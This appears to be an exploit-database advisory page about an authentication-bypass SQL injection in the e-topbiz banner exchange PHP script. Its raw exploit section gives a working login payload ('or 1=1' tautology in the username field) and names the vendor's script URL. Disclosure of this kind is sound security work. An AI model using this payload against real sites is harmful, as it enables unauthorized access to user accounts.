header-logo
Suggest Exploit
vendor:
Banner Exchange PHP
by:
Hussin X
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Banner Exchange PHP
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

e-topbiz banner exchange php (Auth Bypass) SQL Injection Vulnerability

The e-topbiz banner exchange php script is vulnerable to SQL injection. An attacker can bypass authentication by injecting SQL code in the username or password fields. The specific vulnerability allows an attacker to login as any user by using the payload 'test11 ' or ' 1=1' in the username field and any password.

Mitigation:

The vendor should sanitize and validate user input to prevent SQL injection attacks. Users are advised to update to the latest version of the script.
Source

Exploit-DB raw data:

e-topbiz banner exchange php (Auth Bypass) SQL Injection Vulnerability
___________________________________


Author: Hussin X

Home :  www.IQ-TY.com<http://www.IQ-TY.com>

MaiL : darkangeL_G85@Yahoo.CoM
___________________________________

script    : http://e-topbiz.com/oprema/pages/banner1.php

_____

ExploiT
_______

user : test11 ' or ' 1=1
pass: hussin-X

# login....


IQ-SecuritY FoRuM

Navigation

Suggest Exploit

Services By CQR